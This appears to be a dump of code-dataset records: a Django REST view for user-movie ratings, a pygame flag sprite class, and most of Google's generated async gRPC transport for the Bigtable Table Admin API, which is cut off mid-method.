UserToMovieBasicSerializer\n\n\n__all__ = (\n 'UserCheckedMovieCreateView',\n)\n\n\nclass UserCheckedMovieCreateView(generics.CreateAPIView):\n permission_classes = (\n permissions.IsAuthenticated,\n IsUserOrReadOnly,\n )\n queryset = UserToMovie.objects.all()\n serializer_class = UserToMovieBasicSerializer\n\n def create(self, request, *args, **kwargs):\n request.data['user'] = request.user.pk\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n Movie.objects.update_rating_avg(id=self.request.data['movie'])\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n","sub_path":"app/movie/apis/user_to_movie_create.py","file_name":"user_to_movie_create.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"566799967","text":"import pygame\nimport sys\nimport math\nimport os\nfrom pygame.locals import *\n\nclass Flag:\n #tọa độ của flag\n \"\"\"\n Cờ\n Attributes:\n hitBox: tuple\n score: list\n Methods:\n update(player, screen, bg): vẽ và update vị trí của flag\n \"\"\"\n hitBox = (6349, 67, 6, 290)\n score = [0]\n def __init__(self):\n \"\"\"khởi tạo flag\"\"\"\n self.image = pygame.transform.scale(pygame.image.load(os.path.join(\"img\", \"flag.png\")), (40, 32))\n self.rect = self.image.get_rect()\n self.y = 317\n self.x = 6352\n self.change_y = 0\n \n def update(self, player, screen, bg):\n \"\"\" vẽ và update vị trí của flag\"\"\"\n screen.blit(self.image, (self.x + bg.bgX, self.y))\n hitBox = pygame.Rect(self.hitBox)\n player_hitBox = pygame.Rect((abs(bg.bgX) + player.x, player.y, 32, 32))\n if hitBox.colliderect(player_hitBox): #nếu player chạm cột flag sẽ di chuyển\n self.score.append(player.y)\n while self.y >= player.y:\n self.y -= 0.5\n ","sub_path":"classes/flag.py","file_name":"flag.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"86899736","text":"# -*- coding: utf-8 -*-\n# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport warnings\nfrom typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union\n\nfrom google.api_core import gapic_v1\nfrom google.api_core import grpc_helpers_async\nfrom google.api_core import operations_v1\nfrom google.auth import credentials as ga_credentials # type: ignore\nfrom google.auth.transport.grpc import SslCredentials # type: ignore\n\nimport grpc # type: ignore\nfrom grpc.experimental import aio # type: ignore\n\nfrom google.cloud.bigtable_admin_v2.types import bigtable_table_admin\nfrom google.cloud.bigtable_admin_v2.types import table\nfrom google.cloud.bigtable_admin_v2.types import table as gba_table\nfrom google.iam.v1 import iam_policy_pb2 # type: ignore\nfrom google.iam.v1 import policy_pb2 # type: ignore\nfrom google.longrunning import operations_pb2 # type: ignore\nfrom google.protobuf import empty_pb2 # type: ignore\nfrom .base import BigtableTableAdminTransport, DEFAULT_CLIENT_INFO\nfrom .grpc import BigtableTableAdminGrpcTransport\n\n\nclass BigtableTableAdminGrpcAsyncIOTransport(BigtableTableAdminTransport):\n \"\"\"gRPC AsyncIO backend transport for BigtableTableAdmin.\n\n Service for creating, configuring, and deleting Cloud\n Bigtable tables.\n\n Provides access to the table schemas only, not the data stored\n within the tables.\n\n This class defines the same methods as the primary client, so the\n primary client can load the underlying transport implementation\n and call it.\n\n It sends protocol buffers over the wire using gRPC (which is built on\n top of HTTP/2); the ``grpcio`` package must be installed.\n \"\"\"\n\n _grpc_channel: aio.Channel\n _stubs: Dict[str, Callable] = {}\n\n @classmethod\n def create_channel(\n cls,\n host: str = \"bigtableadmin.googleapis.com\",\n credentials: Optional[ga_credentials.Credentials] = None,\n credentials_file: Optional[str] = None,\n scopes: Optional[Sequence[str]] = None,\n quota_project_id: Optional[str] = None,\n **kwargs,\n ) -> aio.Channel:\n \"\"\"Create and return a gRPC AsyncIO channel object.\n Args:\n host (Optional[str]): The host for the channel to use.\n credentials (Optional[~.Credentials]): The\n authorization credentials to attach to requests. These\n credentials identify this application to the service. If\n none are specified, the client will attempt to ascertain\n the credentials from the environment.\n credentials_file (Optional[str]): A file with credentials that can\n be loaded with :func:`google.auth.load_credentials_from_file`.\n This argument is ignored if ``channel`` is provided.\n scopes (Optional[Sequence[str]]): A optional list of scopes needed for this\n service. These are only used when credentials are not specified and\n are passed to :func:`google.auth.default`.\n quota_project_id (Optional[str]): An optional project to use for billing\n and quota.\n kwargs (Optional[dict]): Keyword arguments, which are passed to the\n channel creation.\n Returns:\n aio.Channel: A gRPC AsyncIO channel object.\n \"\"\"\n\n return grpc_helpers_async.create_channel(\n host,\n credentials=credentials,\n credentials_file=credentials_file,\n quota_project_id=quota_project_id,\n default_scopes=cls.AUTH_SCOPES,\n scopes=scopes,\n default_host=cls.DEFAULT_HOST,\n **kwargs,\n )\n\n def __init__(\n self,\n *,\n host: str = \"bigtableadmin.googleapis.com\",\n credentials: Optional[ga_credentials.Credentials] = None,\n credentials_file: Optional[str] = None,\n scopes: Optional[Sequence[str]] = None,\n channel: Optional[aio.Channel] = None,\n api_mtls_endpoint: Optional[str] = None,\n client_cert_source: Optional[Callable[[], Tuple[bytes, bytes]]] = None,\n ssl_channel_credentials: Optional[grpc.ChannelCredentials] = None,\n client_cert_source_for_mtls: Optional[Callable[[], Tuple[bytes, bytes]]] = None,\n quota_project_id: Optional[str] = None,\n client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,\n always_use_jwt_access: Optional[bool] = False,\n api_audience: Optional[str] = None,\n ) -> None:\n \"\"\"Instantiate the transport.\n\n Args:\n host (Optional[str]):\n The hostname to connect to.\n credentials (Optional[google.auth.credentials.Credentials]): The\n authorization credentials to attach to requests. These\n credentials identify the application to the service; if none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n This argument is ignored if ``channel`` is provided.\n credentials_file (Optional[str]): A file with credentials that can\n be loaded with :func:`google.auth.load_credentials_from_file`.\n This argument is ignored if ``channel`` is provided.\n scopes (Optional[Sequence[str]]): A optional list of scopes needed for this\n service. These are only used when credentials are not specified and\n are passed to :func:`google.auth.default`.\n channel (Optional[aio.Channel]): A ``Channel`` instance through\n which to make calls.\n api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.\n If provided, it overrides the ``host`` argument and tries to create\n a mutual TLS channel with client SSL credentials from\n ``client_cert_source`` or application default SSL credentials.\n client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):\n Deprecated. A callback to provide client SSL certificate bytes and\n private key bytes, both in PEM format. It is ignored if\n ``api_mtls_endpoint`` is None.\n ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials\n for the grpc channel. It is ignored if ``channel`` is provided.\n client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):\n A callback to provide client certificate bytes and private key bytes,\n both in PEM format. It is used to configure a mutual TLS channel. It is\n ignored if ``channel`` or ``ssl_channel_credentials`` is provided.\n quota_project_id (Optional[str]): An optional project to use for billing\n and quota.\n client_info (google.api_core.gapic_v1.client_info.ClientInfo):\n The client info used to send a user-agent string along with\n API requests. If ``None``, then default info will be used.\n Generally, you only need to set this if you're developing\n your own client library.\n always_use_jwt_access (Optional[bool]): Whether self signed JWT should\n be used for service account credentials.\n\n Raises:\n google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport\n creation failed for any reason.\n google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``\n and ``credentials_file`` are passed.\n \"\"\"\n self._grpc_channel = None\n self._ssl_channel_credentials = ssl_channel_credentials\n self._stubs: Dict[str, Callable] = {}\n self._operations_client: Optional[operations_v1.OperationsAsyncClient] = None\n\n if api_mtls_endpoint:\n warnings.warn(\"api_mtls_endpoint is deprecated\", DeprecationWarning)\n if client_cert_source:\n warnings.warn(\"client_cert_source is deprecated\", DeprecationWarning)\n\n if channel:\n # Ignore credentials if a channel was passed.\n credentials = False\n # If a channel was explicitly provided, set it.\n self._grpc_channel = channel\n self._ssl_channel_credentials = None\n else:\n if api_mtls_endpoint:\n host = api_mtls_endpoint\n\n # Create SSL credentials with client_cert_source or application\n # default SSL credentials.\n if client_cert_source:\n cert, key = client_cert_source()\n self._ssl_channel_credentials = grpc.ssl_channel_credentials(\n certificate_chain=cert, private_key=key\n )\n else:\n self._ssl_channel_credentials = SslCredentials().ssl_credentials\n\n else:\n if client_cert_source_for_mtls and not ssl_channel_credentials:\n cert, key = client_cert_source_for_mtls()\n self._ssl_channel_credentials = grpc.ssl_channel_credentials(\n certificate_chain=cert, private_key=key\n )\n\n # The base transport sets the host, credentials and scopes\n super().__init__(\n host=host,\n credentials=credentials,\n credentials_file=credentials_file,\n scopes=scopes,\n quota_project_id=quota_project_id,\n client_info=client_info,\n always_use_jwt_access=always_use_jwt_access,\n api_audience=api_audience,\n )\n\n if not self._grpc_channel:\n self._grpc_channel = type(self).create_channel(\n self._host,\n # use the credentials which are saved\n credentials=self._credentials,\n # Set ``credentials_file`` to ``None`` here as\n # the credentials that we saved earlier should be used.\n credentials_file=None,\n scopes=self._scopes,\n ssl_credentials=self._ssl_channel_credentials,\n quota_project_id=quota_project_id,\n options=[\n (\"grpc.max_send_message_length\", -1),\n (\"grpc.max_receive_message_length\", -1),\n ],\n )\n\n # Wrap messages. This must be done after self._grpc_channel exists\n self._prep_wrapped_messages(client_info)\n\n @property\n def grpc_channel(self) -> aio.Channel:\n \"\"\"Create the channel designed to connect to this service.\n\n This property caches on the instance; repeated calls return\n the same channel.\n \"\"\"\n # Return the channel from cache.\n return self._grpc_channel\n\n @property\n def operations_client(self) -> operations_v1.OperationsAsyncClient:\n \"\"\"Create the client designed to process long-running operations.\n\n This property caches on the instance; repeated calls return the same\n client.\n \"\"\"\n # Quick check: Only create a new client if we do not already have one.\n if self._operations_client is None:\n self._operations_client = operations_v1.OperationsAsyncClient(\n self.grpc_channel\n )\n\n # Return the client from cache.\n return self._operations_client\n\n @property\n def create_table(\n self,\n ) -> Callable[\n [bigtable_table_admin.CreateTableRequest], Awaitable[gba_table.Table]\n ]:\n r\"\"\"Return a callable for the create table method over gRPC.\n\n Creates a new table in the specified instance.\n The table can be created with a full set of initial\n column families, specified in the request.\n\n Returns:\n Callable[[~.CreateTableRequest],\n Awaitable[~.Table]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"create_table\" not in self._stubs:\n self._stubs[\"create_table\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/CreateTable\",\n request_serializer=bigtable_table_admin.CreateTableRequest.serialize,\n response_deserializer=gba_table.Table.deserialize,\n )\n return self._stubs[\"create_table\"]\n\n @property\n def create_table_from_snapshot(\n self,\n ) -> Callable[\n [bigtable_table_admin.CreateTableFromSnapshotRequest],\n Awaitable[operations_pb2.Operation],\n ]:\n r\"\"\"Return a callable for the create table from snapshot method over gRPC.\n\n Creates a new table from the specified snapshot. The\n target table must not exist. The snapshot and the table\n must be in the same instance.\n Note: This is a private alpha release of Cloud Bigtable\n snapshots. This feature is not currently available to\n most Cloud Bigtable customers. This feature might be\n changed in backward-incompatible ways and is not\n recommended for production use. It is not subject to any\n SLA or deprecation policy.\n\n Returns:\n Callable[[~.CreateTableFromSnapshotRequest],\n Awaitable[~.Operation]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"create_table_from_snapshot\" not in self._stubs:\n self._stubs[\"create_table_from_snapshot\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/CreateTableFromSnapshot\",\n request_serializer=bigtable_table_admin.CreateTableFromSnapshotRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"create_table_from_snapshot\"]\n\n @property\n def list_tables(\n self,\n ) -> Callable[\n [bigtable_table_admin.ListTablesRequest],\n Awaitable[bigtable_table_admin.ListTablesResponse],\n ]:\n r\"\"\"Return a callable for the list tables method over gRPC.\n\n Lists all tables served from a specified instance.\n\n Returns:\n Callable[[~.ListTablesRequest],\n Awaitable[~.ListTablesResponse]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"list_tables\" not in self._stubs:\n self._stubs[\"list_tables\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/ListTables\",\n request_serializer=bigtable_table_admin.ListTablesRequest.serialize,\n response_deserializer=bigtable_table_admin.ListTablesResponse.deserialize,\n )\n return self._stubs[\"list_tables\"]\n\n @property\n def get_table(\n self,\n ) -> Callable[[bigtable_table_admin.GetTableRequest], Awaitable[table.Table]]:\n r\"\"\"Return a callable for the get table method over gRPC.\n\n Gets metadata information about the specified table.\n\n Returns:\n Callable[[~.GetTableRequest],\n Awaitable[~.Table]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"get_table\" not in self._stubs:\n self._stubs[\"get_table\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/GetTable\",\n request_serializer=bigtable_table_admin.GetTableRequest.serialize,\n response_deserializer=table.Table.deserialize,\n )\n return self._stubs[\"get_table\"]\n\n @property\n def update_table(\n self,\n ) -> Callable[\n [bigtable_table_admin.UpdateTableRequest], Awaitable[operations_pb2.Operation]\n ]:\n r\"\"\"Return a callable for the update table method over gRPC.\n\n Updates a specified table.\n\n Returns:\n Callable[[~.UpdateTableRequest],\n Awaitable[~.Operation]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"update_table\" not in self._stubs:\n self._stubs[\"update_table\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/UpdateTable\",\n request_serializer=bigtable_table_admin.UpdateTableRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"update_table\"]\n\n @property\n def delete_table(\n self,\n ) -> Callable[\n [bigtable_table_admin.DeleteTableRequest], Awaitable[empty_pb2.Empty]\n ]:\n r\"\"\"Return a callable for the delete table method over gRPC.\n\n Permanently deletes a specified table and all of its\n data.\n\n Returns:\n Callable[[~.DeleteTableRequest],\n Awaitable[~.Empty]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"delete_table\" not in self._stubs:\n self._stubs[\"delete_table\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/DeleteTable\",\n request_serializer=bigtable_table_admin.DeleteTableRequest.serialize,\n response_deserializer=empty_pb2.Empty.FromString,\n )\n return self._stubs[\"delete_table\"]\n\n @property\n def undelete_table(\n self,\n ) -> Callable[\n [bigtable_table_admin.UndeleteTableRequest], Awaitable[operations_pb2.Operation]\n ]:\n r\"\"\"Return a callable for the undelete table method over gRPC.\n\n Restores a specified table which was accidentally\n deleted.\n\n Returns:\n Callable[[~.UndeleteTableRequest],\n Awaitable[~.Operation]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"undelete_table\" not in self._stubs:\n self._stubs[\"undelete_table\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/UndeleteTable\",\n request_serializer=bigtable_table_admin.UndeleteTableRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"undelete_table\"]\n\n @property\n def modify_column_families(\n self,\n ) -> Callable[\n [bigtable_table_admin.ModifyColumnFamiliesRequest], Awaitable[table.Table]\n ]:\n r\"\"\"Return a callable for the modify column families method over gRPC.\n\n Performs a series of column family modifications on\n the specified table. Either all or none of the\n modifications will occur before this method returns, but\n data requests received prior to that point may see a\n table where only some modifications have taken effect.\n\n Returns:\n Callable[[~.ModifyColumnFamiliesRequest],\n Awaitable[~.Table]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"modify_column_families\" not in self._stubs:\n self._stubs[\"modify_column_families\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/ModifyColumnFamilies\",\n request_serializer=bigtable_table_admin.ModifyColumnFamiliesRequest.serialize,\n response_deserializer=table.Table.deserialize,\n )\n return self._stubs[\"modify_column_families\"]\n\n @property\n def drop_row_range(\n self,\n ) -> Callable[\n [bigtable_table_admin.DropRowRangeRequest], Awaitable[empty_pb2.Empty]\n ]:\n r\"\"\"Return a callable for the drop row range method over gRPC.\n\n Permanently drop/delete a row range from a specified\n table. The request can specify whether to delete all\n rows in a table, or only those that match a particular\n prefix.\n\n Returns:\n Callable[[~.DropRowRangeRequest],\n Awaitable[~.Empty]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"drop_row_range\" not in self._stubs:\n self._stubs[\"drop_row_range\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/DropRowRange\",\n request_serializer=bigtable_table_admin.DropRowRangeRequest.serialize,\n response_deserializer=empty_pb2.Empty.FromString,\n )\n return self._stubs[\"drop_row_range\"]\n\n @property\n def generate_consistency_token(\n self,\n ) -> Callable[\n [bigtable_table_admin.GenerateConsistencyTokenRequest],\n Awaitable[bigtable_table_admin.GenerateConsistencyTokenResponse],\n ]:\n r\"\"\"Return a callable for the generate consistency token method over gRPC.\n\n Generates a consistency token for a Table, which can\n be used in CheckConsistency to check whether mutations\n to the table that finished before this call started have\n been replicated. The tokens will be available for 90\n days.\n\n Returns:\n Callable[[~.GenerateConsistencyTokenRequest],\n Awaitable[~.GenerateConsistencyTokenResponse]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"generate_consistency_token\" not in self._stubs:\n self._stubs[\"generate_consistency_token\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/GenerateConsistencyToken\",\n request_serializer=bigtable_table_admin.GenerateConsistencyTokenRequest.serialize,\n response_deserializer=bigtable_table_admin.GenerateConsistencyTokenResponse.deserialize,\n )\n return self._stubs[\"generate_consistency_token\"]\n\n @property\n def check_consistency(\n self,\n ) -> Callable[\n [bigtable_table_admin.CheckConsistencyRequest],\n Awaitable[bigtable_table_admin.CheckConsistencyResponse],\n ]:\n r\"\"\"Return a callable for the check consistency method over gRPC.\n\n Checks replication consistency based on a consistency\n token, that is, if replication has caught up based on\n the conditions specified in the token and the check\n request.\n\n Returns:\n Callable[[~.CheckConsistencyRequest],\n Awaitable[~.CheckConsistencyResponse]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"check_consistency\" not in self._stubs:\n self._stubs[\"check_consistency\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/CheckConsistency\",\n request_serializer=bigtable_table_admin.CheckConsistencyRequest.serialize,\n response_deserializer=bigtable_table_admin.CheckConsistencyResponse.deserialize,\n )\n return self._stubs[\"check_consistency\"]\n\n @property\n def snapshot_table(\n self,\n ) -> Callable[\n [bigtable_table_admin.SnapshotTableRequest], Awaitable[operations_pb2.Operation]\n ]:\n r\"\"\"Return a callable for the snapshot table method over gRPC.\n\n Creates a new snapshot in the specified cluster from\n the specified source table. The cluster and the table\n must be in the same instance.\n Note: This is a private alpha release of Cloud Bigtable\n snapshots. This feature is not currently available to\n most Cloud Bigtable customers. This feature might be\n changed in backward-incompatible ways and is not\n recommended for production use. It is not subject to any\n SLA or deprecation policy.\n\n Returns:\n Callable[[~.SnapshotTableRequest],\n Awaitable[~.Operation]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"snapshot_table\" not in self._stubs:\n self._stubs[\"snapshot_table\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/SnapshotTable\",\n request_serializer=bigtable_table_admin.SnapshotTableRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"snapshot_table\"]\n\n @property\n def get_snapshot(\n self,\n ) -> Callable[[bigtable_table_admin.GetSnapshotRequest], Awaitable[table.Snapshot]]:\n r\"\"\"Return a callable for the get snapshot method over gRPC.\n\n Gets metadata information about the specified\n snapshot.\n Note: This is a private alpha release of Cloud Bigtable\n snapshots. This feature is not currently available to\n most Cloud Bigtable customers. This feature might be\n changed in backward-incompatible ways and is not\n recommended for production use. It is not subject to any\n SLA or deprecation policy.\n\n Returns:\n Callable[[~.GetSnapshotRequest],\n Awaitable[~.Snapshot]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"get_snapshot\" not in self._stubs:\n self._stubs[\"get_snapshot\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/GetSnapshot\",\n request_serializer=bigtable_table_admin.GetSnapshotRequest.serialize,\n response_deserializer=table.Snapshot.deserialize,\n )\n return self._stubs[\"get_snapshot\"]\n\n @property\n def list_snapshots(\n self,\n ) -> Callable[\n [bigtable_table_admin.ListSnapshotsRequest],\n Awaitable[bigtable_table_admin.ListSnapshotsResponse],\n ]:\n r\"\"\"Return a callable for the list snapshots method over gRPC.\n\n Lists all snapshots associated with the specified\n cluster.\n Note: This is a private alpha release of Cloud Bigtable\n snapshots. This feature is not currently available to\n most Cloud Bigtable customers. This feature might be\n changed in backward-incompatible ways and is not\n recommended for production use. It is not subject to any\n SLA or deprecation policy.\n\n Returns:\n Callable[[~.ListSnapshotsRequest],\n Awaitable[~.ListSnapshotsResponse]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"list_snapshots\" not in self._stubs:\n self._stubs[\"list_snapshots\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/ListSnapshots\",\n request_serializer=bigtable_table_admin.ListSnapshotsRequest.serialize,\n response_deserializer=bigtable_table_admin.ListSnapshotsResponse.deserialize,\n )\n return self._stubs[\"list_snapshots\"]\n\n @property\n def delete_snapshot(\n self,\n ) -> Callable[\n [bigtable_table_admin.DeleteSnapshotRequest], Awaitable[empty_pb2.Empty]\n ]:\n r\"\"\"Return a callable for the delete snapshot method over gRPC.\n\n Permanently deletes the specified snapshot.\n Note: This is a private alpha release of Cloud Bigtable\n snapshots. This feature is not currently available to\n most Cloud Bigtable customers. This feature might be\n changed in backward-incompatible ways and is not\n recommended for production use. It is not subject to any\n SLA or deprecation policy.\n\n Returns:\n Callable[[~.DeleteSnapshotRequest],\n Awaitable[~.Empty]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"delete_snapshot\" not in self._stubs:\n self._stubs[\"delete_snapshot\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/DeleteSnapshot\",\n request_serializer=bigtable_table_admin.DeleteSnapshotRequest.serialize,\n response_deserializer=empty_pb2.Empty.FromString,\n )\n return self._stubs[\"delete_snapshot\"]\n\n @property\n def create_backup(\n self,\n ) -> Callable[\n [bigtable_table_admin.CreateBackupRequest], Awaitable[operations_pb2.Operation]\n ]:\n r\"\"\"Return a callable for the create backup method over gRPC.\n\n Starts creating a new Cloud Bigtable Backup. The returned backup\n [long-running operation][google.longrunning.Operation] can be\n used to track creation of the backup. The\n [metadata][google.longrunning.Operation.metadata] field type is\n [CreateBackupMetadata][google.bigtable.admin.v2.CreateBackupMetadata].\n The [response][google.longrunning.Operation.response] field type\n is [Backup][google.bigtable.admin.v2.Backup], if successful.\n Cancelling the returned operation will stop the creation and\n delete the backup.\n\n Returns:\n Callable[[~.CreateBackupRequest],\n Awaitable[~.Operation]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"create_backup\" not in self._stubs:\n self._stubs[\"create_backup\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/CreateBackup\",\n request_serializer=bigtable_table_admin.CreateBackupRequest.serialize,\n response_deserializer=operations_pb2.Operation.FromString,\n )\n return self._stubs[\"create_backup\"]\n\n @property\n def get_backup(\n self,\n ) -> Callable[[bigtable_table_admin.GetBackupRequest], Awaitable[table.Backup]]:\n r\"\"\"Return a callable for the get backup method over gRPC.\n\n Gets metadata on a pending or completed Cloud\n Bigtable Backup.\n\n Returns:\n Callable[[~.GetBackupRequest],\n Awaitable[~.Backup]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"get_backup\" not in self._stubs:\n self._stubs[\"get_backup\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/GetBackup\",\n request_serializer=bigtable_table_admin.GetBackupRequest.serialize,\n response_deserializer=table.Backup.deserialize,\n )\n return self._stubs[\"get_backup\"]\n\n @property\n def update_backup(\n self,\n ) -> Callable[[bigtable_table_admin.UpdateBackupRequest], Awaitable[table.Backup]]:\n r\"\"\"Return a callable for the update backup method over gRPC.\n\n Updates a pending or completed Cloud Bigtable Backup.\n\n Returns:\n Callable[[~.UpdateBackupRequest],\n Awaitable[~.Backup]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"update_backup\" not in self._stubs:\n self._stubs[\"update_backup\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/UpdateBackup\",\n request_serializer=bigtable_table_admin.UpdateBackupRequest.serialize,\n response_deserializer=table.Backup.deserialize,\n )\n return self._stubs[\"update_backup\"]\n\n @property\n def delete_backup(\n self,\n ) -> Callable[\n [bigtable_table_admin.DeleteBackupRequest], Awaitable[empty_pb2.Empty]\n ]:\n r\"\"\"Return a callable for the delete backup method over gRPC.\n\n Deletes a pending or completed Cloud Bigtable backup.\n\n Returns:\n Callable[[~.DeleteBackupRequest],\n Awaitable[~.Empty]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"delete_backup\" not in self._stubs:\n self._stubs[\"delete_backup\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/DeleteBackup\",\n request_serializer=bigtable_table_admin.DeleteBackupRequest.serialize,\n response_deserializer=empty_pb2.Empty.FromString,\n )\n return self._stubs[\"delete_backup\"]\n\n @property\n def list_backups(\n self,\n ) -> Callable[\n [bigtable_table_admin.ListBackupsRequest],\n Awaitable[bigtable_table_admin.ListBackupsResponse],\n ]:\n r\"\"\"Return a callable for the list backups method over gRPC.\n\n Lists Cloud Bigtable backups. Returns both completed\n and pending backups.\n\n Returns:\n Callable[[~.ListBackupsRequest],\n Awaitable[~.ListBackupsResponse]]:\n A function that, when called, will call the underlying RPC\n on the server.\n \"\"\"\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"list_backups\" not in self._stubs:\n self._stubs[\"list_backups\"] = self.grpc_channel.unary_unary(\n \"/google.bigtable.admin.v2.BigtableTableAdmin/ListBackups\",\n request_serializer=bigtable_table_admin.ListBackupsRequest.serialize,\n 